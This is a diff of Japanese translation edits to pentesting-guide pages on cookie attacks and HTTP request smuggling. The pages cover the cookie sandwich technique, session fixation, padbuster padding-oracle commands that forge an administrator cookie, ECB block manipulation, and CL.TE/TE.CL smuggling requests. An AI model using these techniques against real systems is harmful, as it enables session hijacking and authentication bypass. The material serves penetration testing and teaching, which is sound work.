-(詳細は[元の研究](https://blog.ankursundara.com/cookie-bugs/)を参照) Java(Jetty、TomCat、Undertow)やPython(Zope、cherrypy、web.py、aiohttp、bottle、webob)を含むいくつかのウェブサーバーは、古いRFC2965サポートのためにクッキー文字列を誤って処理します。彼らは、セミコロンを含んでいても、ダブルクオートされたクッキー値を単一の値として読み取ります。これは通常、キーと値のペアを区切るべきです。
+(詳細は[元の研究](https://blog.ankursundara.com/cookie-bugs/)を参照) Java(Jetty、TomCat、Undertow)やPython(Zope、cherrypy、web.py、aiohttp、bottle、webob)を含むいくつかのウェブサーバーは、古いRFC2965サポートのためにクッキーストリングを誤処理します。彼らは、セミコロンを含んでいても、ダブルクオートされたクッキー値を単一の値として読み取ります。これは通常、キーと値のペアを区切るべきです。
 ```
 RENDER_TEXT="hello world; JSESSIONID=13371337; ASDF=end";
 ```
@@ -179,7 +179,7 @@ RENDER_TEXT="hello world; JSESSIONID=13371337; ASDF=end";
 - Zopeは、次のクッキーの解析を開始するためにカンマを探します。
 - Pythonのクッキークラスは、スペース文字で解析を開始します。
 
-この脆弱性は、クッキーベースのCSRF保護に依存するWebアプリケーションにとって特に危険であり、攻撃者が偽装されたCSRFトークンクッキーを注入し、セキュリティ対策を回避する可能性があります。この問題は、Pythonが重複したクッキー名を処理する方法によって悪化し、最後の出現が以前のものを上書きします。また、`__Secure-`および`__Host-`クッキーが不安全なコンテキストで扱われることに対する懸念を引き起こし、クッキーが偽装に対して脆弱なバックエンドサーバーに渡されると、認可のバイパスを引き起こす可能性があります。
+この脆弱性は、クッキーベースのCSRF保護に依存するWebアプリケーションにおいて特に危険であり、攻撃者が偽装されたCSRFトークンクッキーを注入し、セキュリティ対策を回避する可能性があります。この問題は、Pythonが重複したクッキー名を処理する方法によって悪化し、最後の出現が以前のものを上書きします。また、`__Secure-`および`__Host-`クッキーが不安全なコンテキストで扱われることに対する懸念を引き起こし、クッキーが偽装に対して脆弱なバックエンドサーバーに渡されると、認証バイパスを引き起こす可能性があります。
 
 ### Cookies $version
 
@@ -192,10 +192,10 @@ According to [**this blogpost**](https://portswigger.net/research/bypassing-wafs
 According to [**this blogpost**](https://portswigger.net/research/stealing-httponly-cookies-with-the-cookie-sandwich-technique) クッキーサンドイッチ技術を使用してHttpOnlyクッキーを盗むことが可能です。これらは要件と手順です:
 
 - 明らかに無駄な**クッキーがレスポンスに反映される場所を見つける**
-- **`$Version`**という名前のクッキーを値`1`で作成する(これはJSからのXSS攻撃で行うことができます)し、初期位置を取得するためにより具体的なパスを指定します(Pythonのような一部のフレームワークではこのステップは必要ありません)
-- **反映されるクッキーを作成**し、**開いた二重引用符**を残す値を持ち、前のクッキー(`$Version`)の後に位置するように特定のパスを指定します
+- **値が`1`の`$Version`というクッキーを作成する**(これはJSからのXSS攻撃で行うことができます)より具体的なパスを持たせて初期位置を取得します(Pythonのような一部のフレームワークではこのステップは必要ありません)
+- **反映されるクッキーを作成する**その値に**開いた二重引用符**を残し、前のもの(`$Version`)の後にクッキーDBに配置されるように特定のパスを持たせます
 - その後、正当なクッキーが順番に続きます
-- **二重引用符を閉じるダミークッキーを作成**します
+- **二重引用符を閉じるダミークッキーを作成する**その値の中に
 
 このようにして、被害者のクッキーは新しいクッキーのバージョン1の中に閉じ込められ、反映されるたびに反映されます。
 e.g. from the post:
@@ -211,7 +211,7 @@ document.cookie = `param2=end";`;
 
 前のセクションを確認してください。
 
-#### 引用文字列エンコーディングによる値分析のバイパス
+#### 引用文字列エンコーディングによるバイパス値分析
 
 この解析は、クッキー内のエスケープされた値をアンエスケープすることを示しています。したがって、"\a"は"a"になります。これはWAFをバイパスするのに役立つ場合があります:
 
@@ -222,7 +222,7 @@ document.cookie = `param2=end";`;
 
 RFC2109では、**カンマをクッキー値の区切りとして使用できる**ことが示されています。また、**等号の前後にスペースやタブを追加することも可能です**。したがって、`$Version=1; foo=bar, abc = qux`のようなクッキーは、クッキー`"foo":"bar, admin = qux"`を生成するのではなく、クッキー`foo":"bar"`と`"admin":"qux"`を生成します。2つのクッキーが生成され、adminの前後のスペースが削除されたことに注意してください。
 
-#### クッキー分割による値分析のバイパス
+#### クッキー分割によるバイパス値分析
 
 最後に、異なるバックドアは、異なるクッキーヘッダーで渡された異なるクッキーを文字列として結合します。
 ```
@@ -244,18 +244,18 @@ Resulting cookie: name=eval('test//, comment') => allowed
 
 - **クッキー**は、**ログイン**するたびに**同じ**です。
 - ログアウトして、同じクッキーを使用してみてください。
-- 2つのデバイス(またはブラウザ)で同じアカウントに同じクッキーを使用してログインしてみてください。
+- 2つのデバイス(またはブラウザ)を使用して、同じアカウントに同じクッキーでログインしてみてください。
 - クッキーに情報が含まれているか確認し、変更を試みてください。
-- ほぼ同じユーザー名でいくつかのアカウントを作成し、類似点が見えるか確認してください。
-- "**ログイン状態を保持**"オプションが存在する場合は、その動作を確認してください。存在し、脆弱である可能性がある場合は、他のクッキーを使用せずに**ログイン状態を保持**のクッキーを常に使用してください。
+- ほぼ同じユーザー名で複数のアカウントを作成し、類似点が見えるか確認してください。
+- "**ログイン状態を保持する**"オプションが存在する場合、それがどのように機能するか確認してください。存在し、脆弱である可能性がある場合は、他のクッキーを使用せずに**ログイン状態を保持する**のクッキーを常に使用してください。
 - パスワードを変更しても前のクッキーが機能するか確認してください。
 
 #### **高度なクッキー攻撃**
 
-ログイン時にクッキーが同じ(またはほぼ同じ)である場合、これはおそらくクッキーがアカウントのいくつかのフィールド(おそらくユーザー名)に関連していることを意味します。次に、以下を試みることができます:
+ログイン時にクッキーが同じ(またはほぼ同じ)である場合、これはおそらくクッキーがあなたのアカウントのいくつかのフィールド(おそらくユーザー名)に関連していることを意味します。次に、あなたは:
 
 - 非常に**似た**ユーザー名でたくさんの**アカウント**を作成し、アルゴリズムがどのように機能しているかを**推測**してみてください。
-- **ユーザー名をブルートフォース**してみてください。クッキーがユーザー名の認証方法としてのみ保存されている場合、ユーザー名"**Bmin**"でアカウントを作成し、クッキーのすべての**ビット**を**ブルートフォース**することができます。なぜなら、試すクッキーの1つは"**admin**"に属するものだからです。
+- **ユーザー名をブルートフォース**してみてください。クッキーがあなたのユーザー名の認証方法としてのみ保存されている場合、ユーザー名"**Bmin**"でアカウントを作成し、クッキーのすべての**ビット**を**ブルートフォース**することができます。なぜなら、あなたが試すクッキーの1つは"**admin**"に属するものだからです。
 - **パディング** **オラクル**を試してください(クッキーの内容を復号化できます)。**padbuster**を使用してください。
 
 **パディングオラクル - Padbusterの例**
@@ -268,11 +268,11 @@ padbuster http://web.com/index.php u7bvLewln6PJPSAbMb5pFfnCHSEd6olf 8 -cookies a
 padBuster http://web.com/home.jsp?UID=7B216A634951170FF851D6CC68FC9537858795A28ED4AAC6
 7B216A634951170FF851D6CC68FC9537858795A28ED4AAC6 8 -encoding 2
 ```
-Padbusterは複数回試行し、どの条件がエラー条件(無効なもの)であるかを尋ねます。
+Padbusterは複数回の試行を行い、どの条件がエラー条件(無効な条件)であるかを尋ねます。
 
 その後、クッキーの復号を開始します(数分かかる場合があります)。
 
-攻撃が成功した場合、任意の文字列を暗号化してみることができます。たとえば、**encrypt** **user=administrator**を暗号化したい場合。
+攻撃が成功した場合、任意の文字列を暗号化してみることができます。例えば、**encrypt** **user=administrator**を暗号化したい場合。
 ```
 padbuster http://web.com/index.php 1dMjA5hfXh0jenxJQ0iW6QXKkzAGIWsiDAKV3UwJPT2lBP+zAD0D0w== 8 -cookies thecookie=1dMjA5hfXh0jenxJQ0iW6QXKkzAGIWsiDAKV3UwJPT2lBP+zAD0D0w== -plaintext user=administrator
 ```
@@ -299,7 +299,7 @@ padbuster http://web.com/index.php 1dMjA5hfXh0jenxJQ0iW6QXKkzAGIWsiDAKV3UwJPT2lB
 
 例えば「aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa」というユーザーを作成し、クッキーにパターンがあるかどうかを確認します(ECBは同じキーで各ブロックを暗号化するため、ユーザー名が暗号化されると同じ暗号化されたバイトが現れる可能性があります)。
 
-使用されるブロックのサイズでパターンが存在するはずです。したがって、「a」をブロックのサイズ分繰り返した後に「admin」を追加したユーザー名を作成できます。その後、クッキーから「a」のブロックの暗号化パターンを削除することができます。そして、ユーザー名「admin」のクッキーを得ることができます。
+使用されるブロックのサイズでパターンが存在するはずです。したがって、「a」をブロックのサイズ分暗号化したものを知っていれば、ユーザー名を「a」*(ブロックのサイズ) + "admin"」として作成できます。その後、クッキーから「a」のブロックの暗号化パターンを削除することができます。そして、ユーザー名「admin」のクッキーを得ることができます。
 
 ## 参考文献
 
diff --git a/src/pentesting-web/hacking-with-cookies/cookie-tossing.md b/src/pentesting-web/hacking-with-cookies/cookie-tossing.md
index 8cdafcdb2..630373ca4 100644
--- a/src/pentesting-web/hacking-with-cookies/cookie-tossing.md
+++ b/src/pentesting-web/hacking-with-cookies/cookie-tossing.md
@@ -13,29 +13,29 @@ Cookies Hackingセクションで示されたように、**クッキーがドメ
 
 これは危険であり、攻撃者は次のことができるかもしれません:
 
-- **被害者のクッキーを攻撃者のアカウントに固定する**ことができるため、ユーザーが気づかない場合、**攻撃者のアカウントでアクションを実行します**。攻撃者は興味深い情報を取得できるかもしれません(プラットフォームでのユーザーの検索履歴を確認する、被害者がアカウントにクレジットカードを設定する...)。
-- この[例はこちらにあります](https://snyk.io/articles/hijacking-oauth-flows-via-cookie-tossing/)、攻撃者が被害者が**gitリポジトリへのアクセスを認証するために使用する特定のセクションに自分のクッキーを設定した**ため、攻撃者のアカウントからアクセスされます。
+- **被害者のクッキーを攻撃者のアカウントに固定する**ことができるため、ユーザーが気づかない場合、**攻撃者のアカウントでアクションを実行します**。攻撃者は興味深い情報を取得できるかもしれません(プラットフォーム上でのユーザーの検索履歴を確認する、被害者がアカウントにクレジットカードを設定する...)。
+- この[例はここにあります](https://snyk.io/articles/hijacking-oauth-flows-via-cookie-tossing/)、攻撃者が特定のセクションにクッキーを設定し、被害者が**自分のgitリポジトリへのアクセスを認証するために使用しますが、攻撃者のアカウントから**です。攻撃者は必要なエンドポイントにクッキーを設定します。
 - **クッキーがログイン後に変更されない場合**、攻撃者は単に**クッキーを固定(セッション固定)**し、被害者がログインするのを待ってから**そのクッキーを使用して被害者としてログインします**。
 - 時には、セッションクッキーが変更されても、攻撃者は以前のものを使用し、新しいものも受け取ります。
-- **クッキーが初期値を設定している場合**(flaskのように、**クッキー**が**セッションのCSRFトークン**を**設定することができ、この値は被害者がログインした後も保持される)、**攻撃者はこの既知の値を設定し、その後悪用することができます**(そのシナリオでは、攻撃者はユーザーにCSRFリクエストを実行させることができます)。
+- **クッキーが初期値を設定している場合**(flaskのように、**クッキー**が**セッションのCSRFトークン**を**設定**し、この値が被害者がログインした後も維持される場合)、**攻撃者はこの既知の値を設定し、その後悪用することができます**(そのシナリオでは、攻撃者はユーザーにCSRFリクエストを実行させることができます。なぜなら、CSRFトークンを知っているからです)。
 - 値を設定するのと同様に、攻撃者はサーバーによって生成された認証されていないクッキーを取得し、そこからCSRFトークンを取得して使用することもできます。
 
 ### クッキーの順序
 
 ブラウザが同じ名前の2つのクッキーを受け取ると、**同じスコープ(ドメイン、サブドメイン、パス)に部分的に影響を与える**場合、**ブラウザはリクエストに対して両方のクッキーの値を送信します**。
 
-どちらが**最も特定のパス**を持っているか、またはどちらが**古いもの**であるかに応じて、ブラウザは**最初にクッキーの値を設定し**、次に他のクッキーの値を設定します。例:`Cookie: iduser=MoreSpecificAndOldestCookie; iduser=LessSpecific;`
+どちらが**最も特定のパス**を持っているか、またはどちらが**古いもの**であるかに応じて、ブラウザは**最初にクッキーの値を設定し**、次に他の値を設定します。例:`Cookie: iduser=MoreSpecificAndOldestCookie; iduser=LessSpecific;`
 
 ほとんどの**ウェブサイトは最初の値のみを使用します**。したがって、攻撃者がクッキーを設定したい場合は、別のクッキーが設定される前に設定するか、より特定のパスで設定する方が良いです。
 
 > [!WARNING]
-> さらに、**より特定のパスにクッキーを設定する能力**は非常に興味深いものであり、**被害者が自分のクッキーを使用することができるようにし、悪意のあるクッキーが設定された特定のパスではそのクッキーが先に送信される**ことになります。
+> さらに、**より特定のパスにクッキーを設定する能力**は非常に興味深いです。なぜなら、**被害者が自分のクッキーを使用することができるのは、悪意のあるクッキーが設定された特定のパスを除いて、先に送信されるからです**。
 
 ### 保護バイパス
 
 この攻撃に対する可能な保護は、**ウェブサーバーが同じ名前の2つのクッキーを異なる値で受け入れないこと**です。
 
-攻撃者が被害者にクッキーがすでに与えられた後にクッキーを設定するシナリオを回避するために、攻撃者は**クッキーオーバーフロー**を引き起こし、その後、**正当なクッキーが削除されたら、悪意のあるクッキーを設定する**ことができます。
+攻撃者が被害者にクッキーを与えた後にクッキーを設定するシナリオを回避するために、攻撃者は**クッキーオーバーフロー**を引き起こし、その後、**正当なクッキーが削除されたら、悪意のあるクッキーを設定する**ことができます。
 
 {{#ref}}
 cookie-jar-overflow.md
@@ -45,7 +45,7 @@ cookie-jar-overflow.md
 
 ### クッキーボム
 
-Cookie Tossing攻撃は、**クッキーボム**攻撃を実行するためにも使用される可能性があります:
+クッキー投げ攻撃は、**クッキーボム**攻撃を実行するためにも使用される可能性があります:
 
 {{#ref}}
 cookie-bomb.md
@@ -55,8 +55,8 @@ cookie-bomb.md
 
 #### **クッキー名にプレフィックス`__Host`を使用する**
 
-- クッキー名にこのプレフィックスがある場合、**Secureとしてマークされ、セキュアなオリジンから送信され、Domain属性を含まず、Path属性が/に設定されている場合にのみ**Set-Cookieディレクティブで**受け入れられます**。
-- **これにより、サブドメインがクッキーを頂点ドメインに強制することを防ぎます。これらのクッキーは「ドメインロック」されたものと見なされる可能性があります。**
+- クッキー名にこのプレフィックスがある場合、**Secureとしてマークされ、セキュアなオリジンから送信され、Domain属性を含まず、Path属性が/に設定されている場合にのみ**Set-Cookieディレクティブで受け入れられます。
+- **これにより、サブドメインがクッキーを頂点ドメインに強制することを防ぎます。これらのクッキーは「ドメインロック」と見なされる可能性があります**。
 
 ### 参考文献
 
diff --git a/src/pentesting-web/http-request-smuggling/README.md b/src/pentesting-web/http-request-smuggling/README.md
index 28223dec2..dc23f357c 100644
--- a/src/pentesting-web/http-request-smuggling/README.md
+++ b/src/pentesting-web/http-request-smuggling/README.md
@@ -4,8 +4,8 @@
 
 ## What is
 
-この脆弱性は、**フロントエンドプロキシ**と**バックエンド**サーバーの間に**非同期化**が発生することで、**攻撃者**が**HTTPリクエスト**を**送信**できるようになり、**フロントエンド**プロキシ(ロードバランス/リバースプロキシ)によって**単一のリクエスト**として**解釈**され、**バックエンド**サーバーによって**2つのリクエスト**として**解釈**されることを可能にします。\
-これにより、ユーザーは**自分の後にバックエンドサーバーに到着する次のリクエストを変更**することができます。
+この脆弱性は、**フロントエンドプロキシ**と**バックエンド**サーバーの間に**非同期化**が発生することで、**攻撃者**が**HTTPリクエスト**を**送信**できるようになり、**フロントエンド**プロキシ(ロードバランサー/リバースプロキシ)には**単一のリクエスト**として、**バックエンド**サーバーには**2つのリクエスト**として**解釈**されることを可能にします。\
+これにより、ユーザーは**自分の後にバックエンドサーバーに到着する次のリクエストを**変更することができます。
 
 ### Theory
 
@@ -15,7 +15,7 @@
 
 **Content-Length**
 
-> Content-Lengthエンティティヘッダーは、受信者に送信されるエンティティボディのサイズ(バイト単位)を示します。
+> Content-Lengthエンティティヘッダーは、受信者に送信されるエンティティボディのサイズをバイト単位で示します。
 
 **Transfer-Encoding: chunked**
 
@@ -24,8 +24,8 @@
 
 ### Reality
 
-**フロントエンド**(ロードバランス/リバースプロキシ)は_**content-length**_または_**transfer-encoding**_ヘッダーを処理し、**バックエンド**サーバーは他のヘッダーを処理することで、2つのシステム間に**非同期化**を引き起こします。\
-これは非常に重大な問題であり、**攻撃者はリバースプロキシに1つのリクエストを送信**でき、**バックエンド**サーバーはそれを**2つの異なるリクエスト**として**解釈**します。この技術の**危険性**は、**バックエンド**サーバーが**2番目のリクエストを注入されたものとして**解釈し、**そのクライアントの実際のリクエストが**注入されたリクエストの**一部**となることにあります。
+**フロントエンド**(ロードバランサー/リバースプロキシ)は_**content-length**_または_**transfer-encoding**_ヘッダーを**処理**し、**バックエンド**サーバーは**他の**ものを**処理**し、2つのシステム間に**非同期化**を引き起こします。\
+これは非常に重大な問題であり、**攻撃者はリバースプロキシに1つのリクエストを送信でき、**バックエンド**サーバーはそれを**2つの異なるリクエスト**として**解釈**します。この技術の**危険性**は、**バックエンド**サーバーが**2番目のリクエストを注入されたものとして**解釈し、**そのクライアントの実際のリクエストが**注入されたリクエストの**一部**となることにあります。
 
 ### Particularities
 
@@ -38,9 +38,9 @@ HTTPでは**新しい行文字は2バイトで構成されています:**
 ## Basic Examples
 
 > [!TIP]
-> Burp Suiteでこれを悪用しようとする際は、リピーターで**`Update Content-Length`と`Normalize HTTP/1 line endings`を無効にしてください**。なぜなら、一部のガジェットは新しい行、キャリッジリターン、そして不正なContent-Lengthを悪用するからです。
+> Burp Suiteでこれを悪用しようとする際は、リピーターで**`Update Content-Length`と`Normalize HTTP/1 line endings`を無効にしてください**。一部のガジェットは新しい行、キャリッジリターン、誤ったContent-Lengthを悪用します。
 
-HTTPリクエストスムーギング攻撃は、フロントエンドとバックエンドサーバーが`Content-Length`(CL)および`Transfer-Encoding`(TE)ヘッダーを解釈する際の不一致を利用して、あいまいなリクエストを送信することによって作成されます。これらの攻撃は、主に**CL.TE**、**TE.CL**、および**TE.TE**として異なる形で現れます。各タイプは、フロントエンドとバックエンドサーバーがこれらのヘッダーを優先する方法のユニークな組み合わせを表します。脆弱性は、サーバーが同じリクエストを異なる方法で処理することから生じ、予期しない、そして潜在的に悪意のある結果を引き起こします。
+HTTPリクエストスムーギング攻撃は、フロントエンドとバックエンドサーバーが`Content-Length`(CL)および`Transfer-Encoding`(TE)ヘッダーを解釈する際の不一致を利用して、あいまいなリクエストを送信することで作成されます。これらの攻撃は、主に**CL.TE**、**TE.CL**、および**TE.TE**として異なる形で現れます。各タイプは、フロントエンドとバックエンドサーバーがこれらのヘッダーを優先する方法のユニークな組み合わせを表します。脆弱性は、サーバーが同じリクエストを異なる方法で処理することから生じ、予期しない、そして潜在的に悪意のある結果を引き起こします。
 
 ### Basic Examples of Vulnerability Types
 
@@ -55,7 +55,7 @@ HTTPリクエストスムーギング攻撃は、フロントエンドとバッ
 - **バックエンド (TE):** `Transfer-Encoding`ヘッダーに基づいてリクエストを処理します。
 - **攻撃シナリオ:**
 
-- 攻撃者は、`Content-Length`ヘッダーの値が実際のコンテンツの長さと一致しないリクエストを送信します。
+- 攻撃者は、`Content-Length`ヘッダーの値が実際のコンテンツ長と一致しないリクエストを送信します。
 - フロントエンドサーバーは、`Content-Length`の値に基づいてリクエスト全体をバックエンドに転送します。
 - バックエンドサーバーは、`Transfer-Encoding: chunked`ヘッダーによりリクエストをチャンクとして処理し、残りのデータを別の次のリクエストとして解釈します。
 - **例:**
@@ -79,7 +79,7 @@ Foo: x
 - **バックエンド (CL):** `Content-Length`ヘッダーに基づいてリクエストを処理します。
 - **攻撃シナリオ:**
 
-- 攻撃者は、チャンクサイズ(`7b`)と実際のコンテンツの長さ(`Content-Length: 4`)が一致しないチャンクリクエストを送信します。
+- 攻撃者は、チャンクサイズ(`7b`)と実際のコンテンツ長(`Content-Length: 4`)が一致しないチャンクリクエストを送信します。
 - フロントエンドサーバーは、`Transfer-Encoding`を尊重し、リクエスト全体をバックエンドに転送します。
 - バックエンドサーバーは、`Content-Length`を尊重し、リクエストの最初の部分(`7b`バイト)だけを処理し、残りを意図しない次のリクエストの一部として残します。
 - **例:**
@@ -185,11 +185,11 @@ EMPTY_LINE_HERE
 
 この技術は、**初期のHTTPデータを読み取る際にウェブサーバーを破壊する**ことが可能なシナリオでも有用ですが、**接続を閉じることなく**行います。この方法では、HTTPリクエストの**ボディ**が**次のHTTPリクエスト**として扱われます。
 
-例えば、[**この解説**](https://mizu.re/post/twisty-python)で説明されているように、Werkzeugではいくつかの**Unicode**文字を送信することが可能で、サーバーが**破壊**されます。しかし、HTTP接続が**`Connection: keep-alive`**ヘッダーで作成された場合、リクエストのボディは読み取られず、接続はまだオープンのままとなり、リクエストの**ボディ**は**次のHTTPリクエスト**として扱われます。
+例えば、[**この書き込み**](https://mizu.re/post/twisty-python)で説明されているように、Werkzeugではいくつかの**Unicode**文字を送信することが可能で、サーバーが**破壊**されます。しかし、HTTP接続が**`Connection: keep-alive`**ヘッダーで作成された場合、リクエストのボディは読み取られず、接続はまだオープンのままとなり、リクエストの**ボディ**は**次のHTTPリクエスト**として扱われます。
 
 #### ホップバイホップヘッダーによる強制
 
-ホップバイホップヘッダーを悪用することで、プロキシに**Content-LengthまたはTransfer-Encodingヘッダーを削除させ、HTTPリクエストスムージングを悪用することが可能です**。
+ホップバイホップヘッダーを悪用することで、プロキシに**Content-LengthまたはTransfer-Encodingヘッダーを削除させることができ、HTTPリクエストスムージングを悪用することが可能です**。
 ```
 Connection: Content-Length
 ```
@@ -261,29 +261,29 @@ X
 - **Content-Lengthの変動テスト:**
 - 実際のコンテンツ長と一致しないさまざまな`Content-Length`値を持つリクエストを送信し、サーバーがその不一致をどのように処理するかを観察します。
 - **Transfer-Encodingの変動テスト:**
-- 曖昧または不正な`Transfer-Encoding`ヘッダーを持つリクエストを送信し、フロントエンドとバックエンドサーバーがその操作にどのように異なる応答を示すかを監視します。
+- Obfuscatedまたは不正な`Transfer-Encoding`ヘッダーを持つリクエストを送信し、フロントエンドとバックエンドサーバーがそのような操作にどのように異なる応答を示すかを監視します。
 
 ### HTTPリクエストスムージング脆弱性テスト
 
-タイミング技術の効果を確認した後、クライアントリクエストを操作できるかどうかを検証することが重要です。簡単な方法は、リクエストを毒殺することを試みることです。たとえば、`/`へのリクエストが404応答を返すようにします。前述の`CL.TE`および`TE.CL`の例は、クライアントが異なるリソースにアクセスしようとしているにもかかわらず、404応答を引き出すためにクライアントのリクエストを毒殺する方法を示しています。
+タイミング技術の効果を確認した後、クライアントリクエストを操作できるかどうかを検証することが重要です。簡単な方法は、リクエストを毒することを試みることです。たとえば、`/`へのリクエストが404応答を返すようにします。前述の`CL.TE`および`TE.CL`の例は、クライアントが異なるリソースにアクセスしようとしているにもかかわらず、404応答を引き出すためにクライアントのリクエストを毒する方法を示しています。
 
 **重要な考慮事項**
 
 他のリクエストに干渉してリクエストスムージングの脆弱性をテストする際には、以下に留意してください:
 
 - **異なるネットワーク接続:** 「攻撃」と「通常」のリクエストは、別々のネットワーク接続を介して送信する必要があります。両方のリクエストに同じ接続を使用することは、脆弱性の存在を検証しません。
-- **一貫したURLとパラメータ:** 両方のリクエストに対して同一のURLとパラメータ名を使用することを目指します。現代のアプリケーションは、URLとパラメータに基づいて特定のバックエンドサーバーにリクエストをルーティングすることがよくあります。これらを一致させることで、両方のリクエストが同じサーバーによって処理される可能性が高まり、成功する攻撃の前提条件となります。
-- **タイミングとレース条件:** 「通常」のリクエストは、「攻撃」リクエストからの干渉を検出するために、他の同時アプリケーションリクエストと競合します。したがって、「攻撃」リクエストの直後に「通常」リクエストを送信します。忙しいアプリケーションでは、脆弱性の確認のために複数の試行が必要になる場合があります。
-- **負荷分散の課題:** フロントエンドサーバーが負荷分散装置として機能する場合、リクエストをさまざまなバックエンドシステムに分配することがあります。「攻撃」と「通常」のリクエストが異なるシステムに到達した場合、攻撃は成功しません。この負荷分散の側面は、脆弱性を確認するためにいくつかの試行を必要とする場合があります。
-- **意図しないユーザーへの影響:** あなたの攻撃が他のユーザーのリクエスト(検出のために送信した「通常」のリクエストではない)に影響を与える場合、これはあなたの攻撃が他のアプリケーションユーザーに影響を与えたことを示します。継続的なテストは他のユーザーを混乱させる可能性があるため、慎重なアプローチが求められます。
+- **一貫したURLとパラメータ:** 両方のリクエストに対して同一のURLとパラメータ名を使用することを目指してください。現代のアプリケーションは、URLとパラメータに基づいてリクエストを特定のバックエンドサーバーにルーティングすることがよくあります。これらを一致させることで、両方のリクエストが同じサーバーによって処理される可能性が高まります。これは成功する攻撃の前提条件です。
+- **タイミングとレース条件:** 「通常」のリクエストは、「攻撃」リクエストからの干渉を検出するために、他の同時アプリケーションリクエストと競合します。したがって、「攻撃」リクエストの直後に「通常」リクエストを送信してください。忙しいアプリケーションでは、決定的な脆弱性確認のために複数の試行が必要になる場合があります。
+- **負荷分散の課題:** 負荷バランサーとして機能するフロントエンドサーバーは、リクエストをさまざまなバックエンドシステムに分配することがあります。「攻撃」と「通常」のリクエストが異なるシステムに到達した場合、攻撃は成功しません。この負荷分散の側面は、脆弱性を確認するためにいくつかの試行を必要とする場合があります。
+- **意図しないユーザーへの影響:** あなたの攻撃が他のユーザーのリクエスト(検出のために送信した「通常」のリクエストではない)に偶然影響を与える場合、これはあなたの攻撃が他のアプリケーションユーザーに影響を与えたことを示します。継続的なテストは他のユーザーを混乱させる可能性があるため、慎重なアプローチが求められます。
 
 ## HTTP/1.1パイプライニングのアーティファクトと本物のリクエストスムージングの区別
 
-接続の再利用(keep-alive)とパイプライニングは、同じソケット上で複数のリクエストを送信するテストツールで「スムージング」の錯覚を生じさせることがあります。無害なクライアント側のアーティファクトと実際のサーバー側のデシンクを区別する方法を学びましょう。
+接続の再利用(keep-alive)とパイプライニングは、同じソケットで複数のリクエストを送信するテストツールで「スムージング」の錯覚を生じさせることがあります。無害なクライアント側のアーティファクトと実際のサーバー側のデシンクを区別する方法を学びましょう。
 
 ### なぜパイプライニングが古典的な偽陽性を生むのか
 
-HTTP/1.1は単一のTCP/TLS接続を再利用し、同じストリーム上でリクエストと応答を連結します。パイプライニングでは、クライアントが複数のリクエストを連続して送信し、順序通りの応答を期待します。一般的な偽陽性は、単一の接続上で不正なCL.0スタイルのペイロードを2回再送信することです。
+HTTP/1.1は単一のTCP/TLS接続を再利用し、同じストリームでリクエストと応答を連結します。パイプライニングでは、クライアントが複数のリクエストを連続して送信し、順序通りの応答を期待します。一般的な偽陽性は、単一の接続で不正なCL.0スタイルのペイロードを2回再送信することです。
 ```
 POST / HTTP/1.1
 Host: hackxor.net
@@ -323,38 +323,38 @@ X: Y
 Impact: なし。クライアントがサーバーフレーミングからデシンクしただけです。
 
 > [!TIP]
-> 再利用/パイプラインに依存するBurpモジュール: Turbo Intruderの`requestsPerConnection>1`、Intruderの「HTTP/1接続再利用」、Repeaterの「グループを順番に送信(単一接続)」または「接続再利用を有効にする」。
+> 再利用/パイプラインに依存するBurpモジュール: Turbo Intruder `requestsPerConnection>1`、Intruder "HTTP/1接続再利用"、Repeater "グループを順番に送信(単一接続)"または"接続再利用を有効にする"。
 
-### リトマス試験: パイプラインまたは実際のデシンク?
+### リトマステスト: パイプラインまたは実際のデシンク?
 
 1. 再利用を無効にして再テスト
-- Burp Intruder/RepeaterでHTTP/1再利用をオフにし、「グループを順番に送信」を避ける。
-- Turbo Intruderで`requestsPerConnection=1`および`pipeline=False`を設定する。
+- Burp Intruder/RepeaterでHTTP/1再利用をオフにし、"グループを順番に送信"を避ける。
+- Turbo Intruderで`requestsPerConnection=1`に設定し、`pipeline=False`にする。
 - 挙動が消える場合、クライアント側のパイプラインである可能性が高い。ただし、接続ロック/状態を持つターゲットやクライアント側のデシンクを扱っている場合は除く。
 2. HTTP/2ネストされたレスポンスチェック
 - HTTP/2リクエストを送信する。レスポンスボディに完全なネストされたHTTP/1レスポンスが含まれている場合、純粋なクライアントアーティファクトではなく、バックエンドの解析/デシンクバグを証明したことになります。
 3. 接続ロックされたフロントエンドのための部分リクエストプローブ
 - 一部のフロントエンドは、クライアントが再利用した場合にのみ上流のバックエンド接続を再利用します。部分リクエストを使用して、クライアントの再利用を反映するフロントエンドの挙動を検出します。
-- 接続ロック技術については、PortSwiggerの「ブラウザ駆動のデシンク攻撃」を参照してください。
+- 接続ロック技術については、PortSwiggerの"Browser‑Powered Desync Attacks"を参照してください。
 4. 状態プローブ
 - 同じTCP接続での最初のリクエストとその後のリクエストの違いを探します(最初のリクエストのルーティング/検証)。
-- Burpの「HTTP Request Smuggler」には、これを自動化する接続状態プローブが含まれています。
+- Burp "HTTP Request Smuggler"には、これを自動化する接続状態プローブが含まれています。
 5. ワイヤを可視化する
-- Burpの「HTTP Hacker」拡張機能を使用して、再利用や部分リクエストを実験しながら、連結とメッセージフレーミングを直接検査します。
+- Burp "HTTP Hacker"拡張機能を使用して、再利用や部分リクエストを実験しながら、連結とメッセージフレーミングを直接検査します。
 
 ### 接続ロックされたリクエストスムグリング(再利用が必要)
 
-一部のフロントエンドは、クライアントが再利用した場合にのみ上流接続を再利用します。実際のスムグリングは存在しますが、クライアント側の再利用に条件付けられています。影響を区別して証明するために:
+一部のフロントエンドは、クライアントが再利用した場合にのみ上流接続を再利用します。実際のスムグリングは存在しますが、クライアント側の再利用に条件付けられています。影響を区別し証明するために:
 - サーバー側のバグを証明する
 - HTTP/2ネストされたレスポンスチェックを使用する、または
-- 部分リクエストを使用して、クライアントが再利用したときにのみ上流を再利用するフロントエンドを示す。
-- 直接のクロスユーザーソケットの悪用がブロックされていても、実際の影響を示す:
+- 部分リクエストを使用して、クライアントが再利用したときにのみ上流を再利用することを示す。
+- 直接的なクロスユーザーソケットの悪用がブロックされていても、実際の影響を示す:
 - キャッシュポイズニング: デシンクを介して共有キャッシュを汚染し、レスポンスが他のユーザーに影響を与える。
-- 内部ヘッダーの開示: フロントエンドが注入したヘッダー(例: 認証/信頼ヘッダー)を反映し、認証バイパスにピボットする。
-- フロントエンドの制御をバイパス: 制限されたパス/メソッドをフロントエンドを通過させる。
+- 内部ヘッダーの開示: フロントエンドが注入したヘッダー(例:認証/信頼ヘッダー)を反映し、認証バイパスにピボットする。
+- フロントエンドの制御をバイパスする: 制限されたパス/メソッドをフロントエンドを通過させる。
